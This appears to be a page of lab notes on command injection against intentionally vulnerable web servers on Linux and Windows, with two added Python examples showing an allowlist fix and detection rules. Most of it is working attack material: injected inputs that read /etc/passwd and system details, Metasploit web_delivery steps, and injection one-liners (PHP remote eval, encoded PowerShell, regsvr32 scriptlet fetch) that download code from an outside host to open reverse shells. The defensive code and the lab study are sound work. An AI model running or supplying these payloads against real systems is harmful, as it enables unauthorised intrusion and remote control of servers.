
Windows and Linux lab hosting the vulnerable web servers


COMMANDS USED
Linux example
sudo service mysql start
sudo service apache2 start
192.168.1.1;ls
192.168.1.1 | uname -a & users & id & w
192.168.1.1 | cat /etc/group
192.168.1.1 | pwd & whoami & ps
Bypassing a blacklist that filters “&”, “;”, “&&”, “||”, “#”
High level
192.168.1.1 |cat /etc/passwd
192.168.1.1 |pwd
192.168.1.1 |whoami
192.168.1.1 |ps
192.168.1.1 |id
192.168.1.1 |users
192.168.1.1 |w
192.168.1.1 |uname -a
use exploit/multi/script/web_delivery
show targets
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.130
set lport 4444
exploit
127.0.0.1 &php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.130:8080/ltLFhcm3XaJzbz', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
127.0.0.1 |php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.130:8080/ltLFhcm3XaJzbz', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
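Why the blacklist named above does not stop these inputs, and what a server-side fix looks like, as an added example that is not part of the original post. The function names and the Linux `ping -c 4` arguments are assumptions; the sample inputs are copied from the lists on this page.

```python
import ipaddress
import subprocess

# Tokens the page names as blacklisted; longest first so "&&" goes before "&".
BLACKLISTED = ["&&", "||", "&", ";", "#"]

# Inputs copied from the page's Linux and Windows lists.
PAGE_INPUTS = [
    "192.168.1.1;ls",
    "192.168.1.1 | cat /etc/group",
    "192.168.1.1 |cat /etc/passwd",
    "192.168.1.100 && dir",
    "192.168.1.100 && net user",
]

def blacklist_filter(value):
    """Weak pattern: strip known-bad tokens, then hand the rest to a shell."""
    for token in BLACKLISTED:
        value = value.replace(token, "")
    return value

def parse_target(value):
    """Allowlist pattern: accept only text that parses as one IPv4 address."""
    return str(ipaddress.IPv4Address(value.strip()))  # raises ValueError otherwise

def build_ping_argv(value):
    """Argument vector for ping; the address is one argv entry, never shell text."""
    return ["ping", "-c", "4", parse_target(value)]

def run_ping(value):
    # No shell=True: separators in the input could not start a second command
    # even if validation were skipped, because no shell ever parses the string.
    return subprocess.run(build_ping_argv(value), capture_output=True,
                          text=True, timeout=15)

def compare(value):
    """Return (text the blacklist lets through, True if the allowlist accepts)."""
    try:
        parse_target(value)
        accepted = True
    except ValueError:
        accepted = False
    return blacklist_filter(value), accepted

if __name__ == "__main__":
    for item in PAGE_INPUTS + ["192.168.1.1"]:
        print(repr(item), "->", compare(item))
```

The single pipe is not in the blacklist, so the filtered text still carries it; the allowlist rejects every input from the page and accepts only the bare address.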
Windows commands
We start at the low security level
1 192.168.1.1
2 192.168.1.100 && dir
3 192.168.1.100 && net user
Running PowerShell to gain remote access
1 use multi/script/web_delivery
set lhost 192.168.1.130
set lport 4444
2 The URL syntax for this exploit
set URIPATH powersploit
set target 2
4 set payload windows/powershell_reverse_tcp
5 exploit
6 List the sessions and select a session
sessions -i
sessions -i 1
Low security
192.168.1.1 && powershell.exe -nop -w hidden -e [Base64-encoded command]
Medium
192.168.1.1 | powershell.exe -nop -w hidden -e [Base64-encoded command]
msf6 > use exploit/multi/script/web_delivery
Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 pubprn
5 SyncAppvPublishingServer
6 PSH (Binary)
7 Linux
8 Mac OS X
msf6 exploit(multi/script/web_delivery) > set target 3
target => 3
msf6 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.1.130
lhost => 192.168.1.184
msf6 exploit(multi/script/web_delivery) > set lport 4444
lport => 4444
msf6 exploit(multi/script/web_delivery) > exploit
Low
192.168.1.100 && regsvr32 /s /n /u /i:http://192.168.1.130:8080/8MFMA4Hgf.sct scrobj.dll
Medium
192.168.1.100 | regsvr32 /s /n /u /i:http://192.168.1.130:8080/8MFMA4Hgf.sct scrobj.dll
High
192.168.1.100 || regsvr32 /s /n /u /i:http://192.168.1.130:8080/8MFMA4Hgf.sct scrobj.d
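Detection logic for the request values listed on this page, as an added example that is not part of the original post: it decodes a form body and flags a command separator after the IP address plus the PowerShell, regsvr32 and PHP patterns shown above. The rule names, the `ip` field name and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# One rule per pattern that appears in the page's command lists.
RULES = {
    # An IPv4 address followed by a shell separator (; | & && ||)
    "separator_after_ip": re.compile(
        r"^\s*\d{1,3}(?:\.\d{1,3}){3}\s*(?:\|\||&&|[;|&])"),
    # powershell ... -e / -enc <Base64 text>
    "powershell_encoded": re.compile(
        r"powershell(?:\.exe)?\b.*\s-e(?:nc\w*)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    # regsvr32 fetching a remote scriptlet through scrobj.dll
    "regsvr32_remote_sct": re.compile(
        r"regsvr32\b.*/i:https?://\S+.*scrobj\.dll", re.I),
    # php -r "eval(file_get_contents(...))"
    "php_remote_eval": re.compile(
        r"php\b.*\s-r\s.*eval\s*\(\s*file_get_contents", re.I),
}

def scan_value(value):
    """Return the sorted names of all rules that match one decoded field value."""
    return sorted(name for name, rx in RULES.items() if rx.search(value))

def scan_form_body(body, field="ip"):
    """Decode a URL-encoded form body and scan every value of the given field."""
    hits = set()
    for value in parse_qs(body, keep_blank_values=True).get(field, []):
        hits.update(scan_value(value))
    return sorted(hits)

# Constructed sample bodies (URL-encoded, as a logging proxy or WAF would see them).
SAMPLES = [
    "ip=192.168.1.1&Submit=Submit",
    "ip=192.168.1.1%3Bls&Submit=Submit",
    "ip=192.168.1.100+%7C%7C+regsvr32+%2Fs+%2Fn+%2Fu+"
    "%2Fi%3Ahttp%3A%2F%2F192.168.1.130%3A8080%2Fexample.sct+scrobj.dll",
    "ip=192.168.1.1+%26%26+powershell.exe+-nop+-w+hidden+-e+"
    "QUJDREVGR0hJSktMTU5PUA%3D%3D",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(scan_form_body(body), "<-", body[:60])
```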
https://www.hackingarticles.in/comprehe ... injection/
https://www.hackingarticles.in/command- ... -security/
https://githubhot.com/repo/rapid7/metas ... sues/15618
https://www.hackers-arise.com/metasploi ... or-windows
https://www.hackingarticles.in/hack-rem ... ss-server/